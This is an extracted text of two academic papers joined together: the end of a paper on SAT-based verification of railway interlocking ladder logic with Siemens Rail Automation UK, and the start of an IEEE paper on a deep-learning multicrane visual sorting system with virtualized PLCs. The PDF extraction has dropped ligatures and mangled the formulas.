sorts, functions, and unary predicates, it is possible to describe the English safety properties in a generic logical form. By using the forall quanti er over one or more sorts, a generic formulae may be written that formalises the safety property in question. Example: A typical safety property would be: All train detection devices in the route indicate the line is clear , which is one of the principles stated in [5]. Using the convention that a primed predicate denotes the next state, the above safety property can be formalized as: 8s2Signal; rn 2RouteName; t 2TrackSegment : rn2routesOf (s)^t2tracksOf (rn) =) ((not(proceed (s))^proceed0(s)^set(rn)) =) (not(occupied (t)))) Both primed and unprimed symbols are used within this formula, thus referring to two subsequent states this is the temporal aspect of our logic. Therefore, two models are required to evaluate the truth value of this formula. Due to the Fig. 1. A sample trackplan. relation to ladder logic execution, a further restriction must be enforced requiring that these states must be subsequent. For two single models (T;I);(T;I0) a formula holds if: all unprimed symbols are interpreted over (T;I), and all primed symbols are interpreted over (T;I0), and and under these interpretations evaluates to true. For a countable sequence =<(T;I 0);(T;I 1);::: > a formula is true if it holds for each pair (T;Ii);(T;Ii+1); i0: We writej=T for being true over all model sequences with rst component T. C. Semantics Preserving Formula Translation For each generic formula, a translation process was formed that would produce propositional formulae with concrete vari- ables for each of the case studies under inspection. Step 1: Replace all universal and existential quanti ers by appropriate conjunctions and disjunctions, respectively, by using the topological information given through the trackplan. The resulting formula will be variable free, as all variables have been replaced by constant symbols corresponding to the nitely many elements of the track plan. Example: For the trackplan in Figure 1, and the safety formula in the last example, we obtain: S100(AM )2routesOf (S100) ^AA2tracksOf (S100(AM )) =) (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) ^S100(AM )2routesOf (S106) ^AA2tracksOf (S100(AM )) =) (not(proceed (S106))^proceed0(S106)^ set(S100(AM ))) =) (not(occupied (AA))) ^S100(AM )2routesOf (S110) ^AA2tracksOf (S100(AM )) =) (not(proceed (S110))^proceed0(S110)^ set(S100(AM ))) =) (not(occupied (AA))) ^: : : Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. Element Property Pre x Suf x Track Occupied T<SEGMENT> .OCC(IL) Route Set S<SIGNAL(ROUTE)> .U Signal Proceed S<SIGNAL> .G Fig. 2. A typical variable naming scheme. Here, S100(AM) is a route name, S100 is a signal name, and AAis a track name from the trackplan as shown in Figure 1. Step 2: Eliminate true premises; eliminate subformulae with false premises. After Step 1, the formula consists of a number of subformulae joined by conjunctions. Each of these subformulae involves an implication using elements of the xed track plan and its associated route table, relative to which the premise of each every subformula can be evaluated. Example: The rst subformula from the Step 1 example is: S100(AM )2routesOf (S100)^ AA2tracksOf (S100(AM )) =) (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) According to the trackplan, the premise of this subformula is true ( S100(AM) is a route that starts at signal S100 ; track AA belongs to route S100(AM) as route S100(AM) starts at signal S100 and ends at signal signal S104 , and track AAis on the path from S100 toS104 as can be seen on the trackplan). Thus, we keep (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =)(not(occupied (AA))) from the rst subformula. By examining another subformula resulting from Step 1, a case in which the premise evaluates to false can be found: S100(AM )2routesOf (S106)^ AA2tracksOf (S100(AM )) =) (not(proceed (S106))^proceed0(S106) ^set(S100(AM ))) =) (not(occupied (AA))) Since route 100(AM) is not contained within the routes of signal S106 , the premise of this subformula is false. Thus, we delete the whole subformula. Step 3: Next we replace all predicates with propositional variables according to a variable naming scheme for ladder logic programs. Example: A result of the example in Step 2, was the subformula (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) Now we replace the state describing predicates with proposi- tional variables: (not(S100:G)^S100:G0^S100(AM ):U) =) (not(TAA:OCC (IL))) To this end, we apply a variable naming scheme as shown in Figure 2.IV. E XPERIMENTAL RESULTS Over the last decade, Swansea have developed a veri cation tool speci cally for veri cation of ladder logic programs for railway interlockings [3], [4]. This tool is an assortment of software that each handles one aspect of an overall veri cation procedure. For this work, an adaptive maintenance phase took place focusing on adapting the software to support the newly presented format of safety properties. Clausegen Intermediate TPTP Files SAT Solver Safety Conditions (.cond) Ladder Logic Program (.wt2) Counter-example Trace Positive Verification Result Fig. 3. The Software Structure of the Veri cation Tool The core of the Swansea tool can be divided into two separate operations. The rst operation is the translation from generic safety properties in temporal rst order logic into concrete formulae in temporal propositional logic. In order to perform this translation, some encoding of a track plan is required that provides layout and naming information which are substituted into the generic formulae, see the transforma- tions described in the previous section. The second operation performed by the tool is larger in scope, see Figure 3. Here the software accepts a ladder logic program, a safety condition le (containing at least one temporal propositional formula describing a safety condition), and a number of arguments describing the required veri cation approach. It then handles the veri cation process, including utilisation of a SAT-solver to produce the veri cation output resulting from the chosen methodology. The veri cation approaches that are supported include inductive veri cation [2] [4], bounded model check- ing [2], [3] and temporal (or K) induction [2], [3]. As these approaches have been developed in other papers, here we simply refer the reader to those papers for details. V. A PPLICATION TO A SIEMENS INTERLOCKING To illustrate how the full veri cation approach works, the ladder logic for controlling a scheme plan provided by Siemens Rail Automation UK for illustrative purposes, has been veri ed against a series of newly modelled safety prin- ciples, see Figure 4 for a summative overview of which veri- cation attempts were successful and which produce counter- examples. When veri cation is successful, there is no need for Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. further action. However, when veri cation produces a counter- example, an error analysis needs to take place. As the yellow and red areas in Figure 4 show, veri cation failed in a number of cases. A. Abstract Error Analysis In principle there are a number of reasons why veri cation of a safety property might fail. They include: 1) Wrong encoding of the safety property in FOL. 2) Wrong use of names of propositional variables. 3) A deliberate deviation from the property in the ladder logic program. 4) A false positive. 5) A mistake in the ladder logic program. A wrong encoding of a safety property might arise due to communication problems. Experts in formal methods are not necessarily experts on railway, and rail engineers have seldom received training in formal methods. Similarly, naming conventions in ladder logic programs are often not properly documented. For the rail engineer, the chosen conventions make sense, although the formal methods expert will have to take a given mapping without having a means of control at hand. However, as safety properties and naming conventions remain stable over longer periods of time, this kind of mis- takes can be eliminated by use, i.e., after many veri cation attempts have been carried out successfully, the proportion of these mistakes will decrease. A similar argument will apply to the deliberate deviation from the property in the ladder logic program: this will not happen only once, but will happen only as an established programming practice. In this case, it would be adequate to change the safety property accordingly, in order to verify that the deviating behaviour has been encoded correctly. A false positive will arise when the safety property to be veri ed is not inductive , i.e., all reachable states are safe, however, there exists a safe, unreachable state with a transition into an unsafe state. In order to exclude false positives, one needs to add a suitable invariant to the veri cation. The effect of such an invariant is to reduce the considered state space, hopefully excluding all safe unreachable states with a transition to an unsafe state. Finding such invariants is a challenge, but can work, see, e.g., [1]. Only in the last case is there a need to actually change the ladder logic program. It takes experience and (manual) work, to isolate this case from the others. B. Concrete Error Analysis In particular for our results, see Figure 4, Ref 1highlights an incorrect use of propositional variables (reason 2). This was resolved after reviewing the counter-examples with Siemens Rail Automation UK: highlighted by the change of the row from yellow (top) to green (bottom). Ref 22highlights an incorrect encoding of the safety prop- erty in FOL (reason 1). This was resolved after reviewing the counter examples with Siemens Rail Automation UK: highlighted by the yellow row in the bottom table.Property Reference Inductive Result BMC Result 1 Yellow Yellow 6 Red Yellow 12 Yellow Yellow 22 Red Red 32 Green Green 35 Yellow Yellow Property Reference Inductive Result BMC Result 1 Green Green 6 Red Yellow (*) 12 Yellow Yellow (*) 22 Yellow Yellow (*) 32 Green Green 35 Green Green Fig. 4. Results before (top) and after (bottom) consultation with Siemens Rail Automation UK engineers. The left hand column shows the results of inductive veri cation, whilst the right shows the results of bounded model checking for 50steps. Green means that all concrete instances of a safety principle were veri ed; Yellow means that some of the concrete instances were veri ed, others not; Red means all concrete instances were not veri ed. Finally the star ( ) in the right column of the bottom table indicates that some instances fail due to reason 3or4. Here further scienti c investigation is on going into automated methods for excluding false positives. Overall we could verify just under 50% of the properties using inductive veri cation, whilst for 85% of the properties, no counter examples were found whilst running bounded model checking. VI. C ONCLUSIONS AND PERSPECTIVES The veri cation results achieved show that the technology developed is ready for implementation in interlocking design processes: in terms of run-time and memory-usage, it is possible to verify actual interlocking programs with thousands of lines of code. However, what currently is missing is that veri cation can t fail due to the reasons Wrong encoding of the safety property in FOL or Wrong use of names of propositional variables . We are positive, that Siemens Rail Automation UK engineers together with Swansea academics will run enough experiments to achieve this aim. In future work we plan to add automated invariant nding, c.f. [1]. Acknowledgement. We thank Erwin R. Catesbeiana (Jr.) for inspiring our summative visualization approach. REFERENCES [1] Alessandro Cimatti, Alberto Griggio, Sergio Mover, and Stefano Tonetta. In nite-state invariant checking with ic3 and predicate abstraction. Formal Methods in System Design , 49(3):190 218, Dec 2016. [2] Phillip James. SAT-based Model Checking and its applications to Train Control Software. Master s thesis, Swansea University, 2010. [3] Phillip James and Markus Roggenbach. SAT-based Model Checking of Train Control Systems. In Calco-Jnr 2009 , March 2010. [4] Karim Kanso. Formal veri cation of ladder logic. Master s thesis, Swansea University, 2008. [5] Railway Group Standard. Interlocking principles, 2003. Standards Document GK/RT0060. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply.
Multicrane_Visual_Sorting_System_Based_on_Deep_Learning_With_Virtualized_Programmable_Logic_Controllers_in_Industrial_Internet.pdf
We develop a deep-learning-based multicrane visual sorting system with virtualized programmable logiccontrollers (PLCs) in intelligent manufacturing, which en-ables the accurate location and suction of the materialson the conveyor belt. First, virtualized PLCs are deployedin the eld and the cloud to break data islands for ef cientcommunication between low-level devices. Second, arti -cial intelligence algorithms are integrated into the physicalindustrial control system in which cooperation between vir-tualized PLCs and the visual recognition model is devel-oped to complete the industrial control closed loop. Third,we establish a visual recognition model in which objectdetection algorithms are used to process the original im-age and then obtain the position and type of the objectin the pixel coordinate system. In addition, a new linearinterpolation-based backpropagation neural network is pre-sented to provide the transform relation between the pixelcoordinate system and the world coordinate system that the crane needs to precisely suck the material. The whole system is applied in a time-sensitive network environmentin a highly reliable and stable manner. The experimentalprototype system demonstrates that high recognition ac-curacy can be achieved for the visual sorting system withinan acceptable time frame. The accuracy of the sorting taskreaches 96.5% and the average consumption time of each Manuscript received 1 January 2023; revised 8 March 2023 and 28 July 2023; accepted 27 August 2023. Date of publication 22 Septem- ber 2023; date of current version 23 February 2024. This work wassupported in part by the National Key Research and Development Program under Grant 2020YFB1708800, in part by Guangdong Key Research and Development Program under Grant 2020B0101130007,in part by the Fundamental Research Funds for Central Universitiesunder Grant FRF-MP-20-37, in part by Guangdong Basic and Applied Basic Research Foundation under Grant 2021A1515110577, in part by China Postdoctoral Science Foundation under Grant 2021M700385,and in part by the Central Guidance on Local Science and TechnologyDevelopment Fund of Shanxi Province under Grant YDZJSX2022B019. Paper no. TII-23-0005. (Corresponding author: Jianquan Wang.) Meixia Fu, Zhenqian Wang, Jianquan Wang, Qu Wang, and Zhangchao Ma are with the School of Automation and Electrical Engi-neering, Institute of Industrial Internet, University of Science and Tech- nology Beijing, Beijing 100083, China (e-mail: [email protected]; [email protected]; [email protected]; [email protected]; [email protected]). Danshi Wang is with the State Key Laboratory of Information Pho- tonics and Optical Communications, Beijing University of Posts and Telecommunications, Beijing 100876, China (e-mail: [email protected]). Color versions of one or more gures in this article are available at https://doi.org/10.1109/TII.2023.3313641. Digital Object Identi er 10.1109/TII.2023.3313641object is approximately 2.317 s when the speed of the con- veyor belt is 5.2 m/min.
3726 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Multicrane Visual Sorting System Based on Deep Learning With Virtualized Programmable Logic Controllers in Industrial Internet Meixia Fu , Zhenqian Wang , Jianquan Wang, Qu Wang , Zhangchao Ma , and Danshi Wang , Senior Member, IEEE Index Terms Backpropagation (BP) neural network, deep learning, intelligent manufacturing, linear interpola-tion, virtualized programmable logic controllers (PLCs), vi-sual sorting system. I. INTRODUCTION INTELLIGENT manufacturing [1]has recently received in- creasing attention from both academia and industry world- wide, which is necessary to integrate with many emergingtechnologies, such as arti cial intelligence (AI) [2],[3],5 G [4], and edge computing [5], to improve the architecture of the Industrial Internet. In particular, the intellectualization provides the development in the unmanned direction and transforms industrial chains. The hierarchical architecture of the industrial automation pyramid is introduced in Fig. 1, which consists of ve levels, including the eld level, control level, supervisory level, op-eration level, and enterprise level from the bottom to the top [6],[7]. The eld data are processed level by level, which cannot effectively apply emerging technologies in industrialarchitecture and seriously in uences the effectiveness and time- liness of urgent applications. The control level occupies an important position in the pyramid structure, which aims touse programmable logic controllers (PLCs) [8]that sense the inputs, execute the developed program, and write the outputs. For example, PLCs control the speed of cranes and facilitatethe collection of the materials on the conveyor belt through suction in industrial visual sorting systems. However, tradi- tional PLCs cannot realize data interworking between devices because of different industrial control protocols. It is dif cult to meet the exible and scalable deployment of traditionalPLCs with high costs. Furthermore, emerging technologies are dif cult to implement in industrial control systems. The control function is necessary to be virtualized and cooperate with AIapplications in the cloud to meet the requirements of Industry 4.0[9]. Visual sorting systems [10] occupy an important position in intelligent manufacturing due to the development of deep learning [11]. Speci cally, multicrane visual sorting systems with cooperation have attracted more interest because of their 1551-3203 2023 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3727 Fig. 1. Hierarchical architecture of the industrial automation pyramid. massive applications in iron mining, steel metallurgy, coal min- ing, and other elds. Multicrane visual sorting systems have twomain critical technologies, including object detection [12] that aims to recognize the type of the object and obtain the pixel coordinates, and coordinate conversion [13] that aims to get the world pixel coordinates of all materials. However, many key technology challenges remain due to the high-precision andreliability requirements of systems. In addition, the device in the visual sorting system is controlled by PLCs, which need to cooperate to complete sorting task. To address the above challenges, this article improves the hierarchical architecture of the industrial automation pyramid, a ss h o w ni nF i g . 1. The function of traditional PLCs is virtualized to be exibly employed in the eld or the cloud for interworking equipment. The number of PLCs can be set randomly according to CPU resource. The data of low-level devices can be sent tothe cloud for supporting AI applications. The result of the AI platform is transmitted to cloud PLCs (C-PLCs) that conduct the operation of eld devices. In addition, we develop a deep-learning-based multicrane visual sorting system, which enables to accurately locate and suck the material on the conveyor belt. Virtualized PLCs are applied to conduct the cranes in a time-sensitive network (TSN) environment for highly reliable and stable control. Deep-learning-based methods and cameracalibration approaches are used to locate and recognize materi- als. The main contributions can be summarized as follows. 1) The C-PLCs and eld virtualized PLCs (F-vPLCs) are developed in the cloud and the eld instead of traditional hardware PLCs, which can break data islands and realize collaboration between low-level devices. 2) AI algorithms are integrated into the industrial control system in which the cooperation between the virtual recognition model and virtualized PLCs is completed tocontrol multicrane and suck the materials. 3) In the virtual sorting system, the you only look once (YOLOv5) algorithm is utilized to obtain the typesand pixel coordinates of the objects. A new linear interpolation-based backpropagation (BP) network isproposed to optimize the transformation between the pixel coordinate system and the world coordinate system. 4) A multicrane visual sorting experimental platform is established to verify the proposed methods. Abundant experimental results can demonstrate the performance of the whole framework. The rest of this article is organized as follows. In Section II, we present the related work concerning the evolution of PLC, object detection, and camera calibration. Section IIIintroduces the deployment of virtualized PLCs, multicrane visual sortingsystem, and visual recognition algorithms. Section IVpresents a large number of experimental results and analyses. Finally, Section Vconcludes this article. II. R ELATED WORK With the exibility and scalability requirements of intelligent manufacturing, it is necessary to explore an integrated method to break the data island and improve the coordination among devices. Many control function methods have been proposed.A PLC programming environment based on a virtual plant was proposed to provide ef cient construction processes in discrete event systems, which supported the speci cation of discreteevent models in a hierarchical, modular manner [14]. Real hardware PLCs based on real plants were designed to connect a 3-D layout model and a control program [15]. Cloud-based software PLCs were introduced to achieve improved scalability and multitenancy performance [16] in which the devices and sen- sors were connected to the cloud through the OPC-UA protocol[17] and controlled by software PLCs that could dynamically scale and assign workloads. A novel virtual-PLC approach was demonstrated to prevent signi cant remote attack perturbation inindustrial control systems [18]. However, the above PLCs cannot be deployed on the cloud or the eld and do not have AI applica- tion capabilities. There are massive devices in the factory, many of which are required to cooperate with each other for the same task; for instance, in a multicrane visual sorting system, eachcrane needs to work cooperatively. It is necessary to research Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3728 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 virtualized PLCs and cooperate with emerging technologies for Industry 4.0. In a multicrane visual sorting system, the materials on the conveyor belt are necessary to be located and recognized. Con-volutional neural network (CNN) based algorithms [19] have been widely used in object detection and classi cation and have achieved excellent performance in computer vision [20]. There are two main series of methods, including the one- stage algorithms in the YOLO [21] architecture series and the single-shot multiBox detector [22] architecture series, and the two-stage algorithms in the faster region-based convolutional network (R-CNN) [23] architecture series. An edge intelligence- based improved YOLOv4 framework that included a channel at- tention mechanism and a high-resolution network was proposed to improve vehicle detection [24]. Faster R-CNN was applied to automatically classify wheel hubs and send them to the correct the operation location in production lines for high detection accuracy [10]. A single-stage grasp detection framework based on a region proposal network architecture was designed for a robotic grasp system, the network complexity of which was lower than that of a two-stage architecture [25]. However, these object detection methods are used in wheel hub location and robotic grasp tasks but are unsuitable for multicrane sorting systems. Compared with two-stage algorithms, the YOLO archi-tecture series achieves signi cant performance and complexity improvements. Due to the requirements of high accuracy and timeliness, a fast detection algorithm [26] should be considered in the intelligent multicrane system for further enhancement. Additionally, there are many improved camera calibration methods [27]. Zhang [28] proposed the most typical camera calibration method that executes transformations from the pixel coordinate system and the world coordinate system via differenttransformation matrices. An inverse matrix is a kind of complex nonlinear transformation that can be tted by a neural network, and such a matrix performs very well in complicated nonlin-ear mapping relation cases. Sheng et al. [29] proposed a BP neural-network-based camera calibration method to reconstruct 3-D coordinates from pixels under an image coordinate sys-tem. A CNN-based camera calibration method was proposed to recognize checkerboard corners and obtain the mean square error (MSE) per image [30]. However, these methods only consider the pixel coordinates on the corners of the checkerboard and more points are necessary to be considered, especially for deep-learning-based methods. III. M ULTICRANE VISUAL SORTING SYSTEM WITH VIRTUALIZED PLC S A. Flexible Deployment of Virtualized PLCs We develop a exible deployment framework of virtualized PLCs in Fig. 2in which F-vPLCs and C-PLCs are set in the eld and the cloud, respectively. The low layer relates to input/output modules that consist of eld components and industrial personal computers (IPCs). There are massive devices, such as elec- tric machinery, conveyor belts, cranes, transducers, automated guided vehicles, and other sensors in the industrial process,which are necessarily connected to the network. We employ Fig. 2. Flexible deployment framework of virtualized PLCs in the eld and the cloud. many F-vPLCs in IPC that control the running of low-level devices and support Modbus, EtherCAT, Pro Net, Powerlink,and other protocols [31]. Communication network can be set as wired network, such as TSN, or wireless network, such as 5G-TSN bridge. In the experiments, we initially use TSN as thedata transmission channel for low latency, ultrareliability, and deterministic communications. On the cloud, we employ C-PLCs server, such as X86 server and AI server. The number of C-PLCs mainly depends on the CPU resources. The vision module on the AI server obtains the video stream from the camera and processes the data toobtain the types, positions, and the timestamps of the materials in multicrane visual sorting system, the results of which are transmitted to C-PLCs server. A transmission control proto- col[32] link is established between AI server and C-PLCs server. Moreover, AI server clock needs to be synchronizedwith C-PLCs clock because the moving distance and sorting position of the crane are calculated by the time difference between C-PLCs server and AI server. We use network timeprotocol (NTP) [33] to synchronize them in this system. Both C-PLCs server and AI server are designed as NTP clients, which are synchronized with the NTP server to achieve indirecttime synchronization. The synchronization time of NTP is less than 1 ms, which hardly affects the operation of the whole system. Fig. 3shows the structure of the virtualized PLC, which consists of the server, operating system, runtime, and integrated development environment (IDE). The common servers are X86servers on the cloud or IPCs in terminals. X86 server for cloud PLCs and IPC for F-vPLCs are used in the multicrane visual sorting system. Both Windows and Linux operating systems are supported. The Linux operating system is adopted in the experiments. Docker as runtime is designed to make virtualPLCs integrate and deploy exibly in the eld and on the cloud. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3729 Fig. 3. Example of the virtualized PLC. Fig. 4. Framework of the intelligent multicrane visual sorting system. In IDE, we can develop many modules, including cloud-edge- terminal collaborative deployment, computing resource man- agement, and multimask distributed scheduling. Once the dataand control function are improved in the cloud, AI algorithms can be combined with them to realize industrial intelligence and unmanned control. Finally, a multicrane visual sorting systemis established in which the exible deployment of virtualized PLCs is conducted to control devices. B. Multicrane Visual Sorting System Based on Deep Learning With Virtualized PLCs In this section, we design a multicrane visual sorting system based on deep learning with virtualized PLCs, the framework of which is illustrated in Fig. 4. There are four core modules, including the material conveyance module, object detectionmodule, camera calibration module, and control module. First, the material conveying module uses a conveyor belt to transport materials and one camera is xed on the cranes to capture theimages of materials in the eld. Then, the images are sent to the object detection module on AI server that utilizes intelli- gent methods to process the data and obtain the positions and types of the materials on the conveyor belt. Here, each position is represented as pixel coordinates that cannot be given toPLCs and need to be converted to world coordinates. Next,Fig. 5. Structure of YOLOv5 for material detection in the visual sorting system. a new camera calibration module on AI server is designed to change the pixel coordinates into world coordinates. Afterward, the world coordinates, types, and timestamps of the materi-als are transmitted to the control module, in which C-PLC sends commands to F-vPLCs. Finally, F-vPLCs control two cranes that suck materials and place them in the designated box.There are two critical components in the visual sorting system: the visual recognition algorithm and the camera calibration method, which seriously affect the sorting accuracy. Hence, we mainly introduce the object detection module and camera calibration module as follows. C. Object Detection Module We apply the YOLOv5 algorithm to detect and recognize the materials on the conveyor belt. The architecture of YOLOv5, as s h o w ni nF i g . 5, consists of three main parts: backbone, neck, and prediction. The backbone extracts the salient features of the inputimages. A cross-stage particle network [34] is integrated into Darknet [35] to create CSPDarket as the backbone of YOLOv5. Compared with Darknet53 in YOLOv3, CSPDarket53 performs signi cantly better in terms of its computation time and detection accuracy. The purpose of the neck is to generate feature pyramidsand recognize the same object with multiscale feature fusion. A path aggregation network (PAN) [36] is used in the neck, which can easily connect the feature grid and all feature layers.Compared with feature pyramid network [37] in YOLOv3, PAN can obtain more useful features from the low and high layers. The prediction module outputs vectors that consist of thecoordinates, classi cation result, and con dence score of the predicted bounding box, which is the same as with YOLOv3. Finally, the positions and types of the materials on the conveyorbelt are obtained. We compare the performance of YOLOv3 and YOLOv5 on the visual recognition module. The output of YOLOv5 predicts ve vectors ( x 1,y 1,x 2,y 2,C ,P) for each bounding box. ( x1,y 1)denotes the lower left corner coordinates and ( x2,y 2)represents the upper right coordinates of the bounding box. Cis the classi cation of the bounding box.Pis the con dence score that re ects how accurately the bounding box is predicted. These ve vectors can be utilizedto calculate the loss to optimize the network. The total loss of Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3730 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 YOLOv5 consists of a regression loss, a classi cation loss, and a con dence loss. Regression loss : The diagonal coordinates ( x1,y 1,x 2,y 2) of the predicted and truth values are used for bounding boxregression. The generalized intersection over union (GIoU) [38] method is utilized as the regression loss to allow the predicted coordinate close to the truth coordinate. Compared with IoU,GIoU can solve the problem that the loss value is 0 when the predicted bounding box and the truth bounding box do not overlap. Ais the predicted bounding box and Bis the truth bounding box. IoU is calculated as the ratio of the intersection area and union area between AandB.Cis the smallest box that includes AandB. The difference between area Cand the union area is obtained. GIoU is the ratio of the difference and area C. The regression loss is summarized as follows: L reg=1 GIoU = 1+AC AU AC IoU (1) where ACis the area of Cthat is the smallest box that includes Aand B.AUis the area of the union between truth box Aand prediction box B. Classi cation loss : It aims to recognize and optimize the classi cation of materials. Binary cross entropy with logits loss[39] is used and summarized as follows: L cls=1 NN/summationdisplay i=1[ Ciln(sigmoid(Ci))+( 1 Ci)ln(1 sigmoid(Ci))] (2) where Nis the size of the minibatch, Ciis the prediction of the classi cation, and Ciis the label of the classi cation. Con dence loss : It aims to optimize the con dence of the bounding box. We also use binary cross entropy with logits lossas the con dence loss, which is given by L con=1 NN/summationdisplay i=1[ Piln(sigmoid(Pi))+( 1 Pi)ln(1 sigmoid(Pi))] (3) where Nis the size of the minibatch, Piis the prediction of the con dence, and Piis the label of the con dence. The value of Piis [0, 1]. The total loss of YOLOv5 is Ltotal=Lreg+Lcls+Lcon. (4) D. Typical Camera Calibration Method Camera calibration [28] aims to describe the collection be- tween the pixel coordinate system and the world coordinatesystem, which requires three transformations, as shown in Fig. 6. The rst is from the pixel coordinate system ( u,v) to the image coordinate system ( x,y), where the relation between them is u v 1 = 1/dx0u 0 01/dyv0 00 1 x y 1 (5) Fig. 6. Mathematical model of camera calibration. where ( u0,v0) is the coordinate of the origin oin the pixel coordinate system, and ( dx,dy) indicates the number of pixels corresponding to the unit length in the image coordinate system. The second is from the image coordinate system ( x,y)t ot h e camera coordinate system ( Xc,Yc,Zc), and the relation between them can be summarized as follows: Zc x y 1 = f0 0f 0000 00 10 Xc Yc Zc 1 (6) where fis the focal length of the camera. The last is from the camera coordinate system ( Xc,Yc,Zc) to the world coordinate system ( Xw,Yw,Zw), and the relation between them can be summarized as follows: Xc Yc Zc 1 =/bracketleftbiggRT 0T1/bracketrightbigg Xw Yw Zw 1 (7) where Ris a rotation matrix of size 3 3,Tis a translation matrix of size 3 1, and 0Ti s( 0 ,0 ,0 ) . According to (5) (7), the relation between the pixel coordi- nate system and the world coordinate system can be obtained asfollows: Z c u v 1 =A[R,T]P = fx0u00 0fyv00 001 0 /bracketleftbiggRT 0T1/bracketrightbigg Xw Yw Zw 1 (8) where Ais the internal parameter matrix of the camera. [ R,T] is the external parameter matrix of the camera. Pis a real point in the world coordinate system. The typical camera calibration method is mostly related to the parameters of the camera. The error of the inverse transformation is large during the solving process. Equation (8)shows that the relation between the pixel coordinate system and the world Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLC s 3731 Fig. 7. Comparison of base calibration and linear interpolation-based calibration. (a) The base calibration. (b) The linear interpolation-basedcalibration. Fig. 8. Architecture of BP neural network for coordinate transforma- tion. coordinate system is complex and nonlinear. BP neural network performs very well in nonlinear presentation. Therefore, a new linear interpolation-based BP neural network is proposed for camera calibration and compared with the typical camera cali-bration method. E. Linear Interpolation-Based BP Neural Network for Camera Calibration The primary procedure of camera calibration is to make a checkerboard with a size of 5 cm 5 cm for each black and white square because the units of the coordinates in the cranesystem are 5 cm. The comparison between the base calibration and linear interpolation-based calibration methods is presented in Fig. 7. The red points in the corner are the training data for BP neural network in Fig. 7(a), but the other points are never considered, which can cause large errors when the materials are not in the corner. Therefore, the linear interpolation methodis utilized to obtain more points in Fig. 7(b), which provides more training data for BP neural network to establish the relation between the pixel coordinate system and the world coordinatesystem. This can improve the robustness of BP network in cases with more materials on the conveyor belt. Fig. 8shows the architecture of BP neural network, which consists of ten layers: an input layer, hidden layers, and an output layer. In this work, the input is the pixel coordinate ( u,v), and the output is the world coordinate ( X w,Yw,Zw). The hidden layers include eight layers that have different numbers of neurons, such as 10, 24, 48, 96, 192, 96, 48, and 24. The weights wijbetween the input layer and the rst hidden layer can be taken as a 3 10TABLE I LINEAR INTERPOLATION -BASED BP N EURAL -NETWORK ALGORITHM matrix. The jth neuron s output for the rst hidden layer is O(1) j=f/parenleftbig WTx, b/parenrightbig =f/parenleftBiggI/summationdisplay i=1wijxi+b(1)/parenrightBigg (9) where i=1,2,3,j=1,2,..., 10,xiis the coordinate of feature points ( u,v, 1), and b(1)is the bias ( b1,b2,...,b j).fis the activation function, which is a recti ed linear unit (ReLU) [40] and can be summarized as follows: f(x)=/braceleftbiggx, x > 0 0,x< 0/bracerightbigg . (10) The neuron s outputs for the other hidden layers are same as those in (5).T h enth neuron s output for the output layer is O(9) n=f/parenleftbig WTx, b/parenrightbig =f/parenleftBiggM/summationdisplay m=1wmnO(8) m+b(9)/parenrightBigg (11) where m=1,2,..., 24,n=1,2,3.O(8) mis themth neuron s output for the last hidden layer. fis still the ReLU function. b(9) is the bias. The relation between the pixel coordinate system and the world coordinate system in (4)can be replaced by the BP neural network, which greatly ts the nonlinear relationship.Furthermore, BP neural network does not need to utilize the parameters of the camera to solve the inverse transformation, as this would always cause large coordinate conversion errors. The loss function is the MSE loss [41], which can be summa- rized for one point as follows: MSELoss =1 KK/summationdisplay k=1(yi yi)2(12) where yiis the prediction O(9) nof BP neural network. yiis the truth label, which is the world coordinate ( Xw,Yw,Zw)i nt h i s article. The value of Kis 3. For a minibatch, the total loss is the average of all MSE loss values for updating the network. The processing approach of the linear interpolation-based BPneural network is shown in Table I. First, the dataset is obtained Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply. 3732 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024 Fig. 9. Experimental structure of multicrane visual sorting system. from the linear interpolation method. Then, the data are sent to the network and the error is calculated. Next, the parameters for each episode are updated through the BP algorithm. Finally,the world coordinates of all objects are obtained for each frame. After training, we can obtain the loss function curve to observe the algorithmic performance, which will be shown in Section IV. F . Evaluation Methods In general, precision, recall, and mean average precision (mAP) are utilized as the standard methods for evaluating object detection performance [42]. The formulae of the precision and recall rate are given as follows: Precision (%) =TP TP+FP 100 (13) Recall Rate (%)=TP TP+FN 100 (14) where TP denotes the true positives, which are the number of correctly detected items. FP represents the false positives that are the number of predicting negative as positive, which is called the commission error. FN denotes the false negatives, which arethe number of predicting the positive as negative, which is called the omission error. Precision is de ned as the ratio of true-positive detections to all detections. The recall rate re ectsthe sensitivity of the detector. The per-class AP is 